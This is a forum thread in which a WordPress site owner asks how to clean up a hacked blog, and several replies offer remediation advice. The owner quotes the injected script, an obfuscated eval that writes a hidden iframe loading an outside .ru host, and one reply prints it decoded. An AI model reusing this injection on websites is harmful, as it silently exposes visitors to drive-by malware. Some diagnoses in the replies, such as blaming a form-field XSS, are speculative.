Some idiot keeps hacking my websites, up until now they have just been showcase sites for my wordpress themes so I could uninstall wordpress and reinstall it without too much hassle. But now someone has hacked one of my major sites and I need help. When you go to the blog you get this in the source: <!-- ~ --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%66%66%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%36%31%31%35%29%2b%27%39%5c%27%20%77%69%64%74%68%3d%37%39%35%20%68%65%69%67%68%74%3d%32%39%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script><!-- ~ --> Code (markup): and it is downloading something from traffurl.ru How do i get rid of it without having to lose all of my content and how to I prevent this from happening again. Oh and why do idiots do this, twats. Any help will be much appreciated, thanks Simon North
OK, ive managed to sort it out on the wordpress sites, just open index.php and delete the top line. How did they get that line of code on in the first place, do they know my passwords of is it some sql hack or summat. Thanks
Are you using a free template (skin)? If not be sure to change both your cPanel and WP passwords. Also check your local computer for spyware or key loggers.
And try running the latest wordpress with the latest versions of plugins, as there might be a vulnerability in there somewhere.
Hi, I would suggest you check you ftp access logs. If you don't have any I would suggest changing your ftp password in particular and see if the issue stops.
All of the above, plus: Change the password for wordpress admin panel. They can edit files from there too. Check if your host is configured correctly and all security measures have been taken.
Looks like a XSS attack ("window.status='Done';document.write('<iframe name=ff4 src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*236115)+'9\' width=795 height=297 style=\'display: none\'></iframe>')")); Code (markup): You have a form field on your site that is allowing this person to inject code into your blog. It looks like anyone that visits your site will also be infected. Either your WP has a security hole or one of the plugins, that has some form field has a problem. Anyone who visits your site will have their browser abused. You can see from the iframe code how info is be accessed from the .ru domain. So more than likely you were made part of a botnet. Uninstalling and re-installing is not going to fix your problem. If your other sites have the same setup, they are vulnerable too. phplife
- upgrade Wordpress to latest stable version - check if all your plugins and widgets are updated. - check on google if anyone has had issues with your theme - check on server file permissions Hope this may help you out.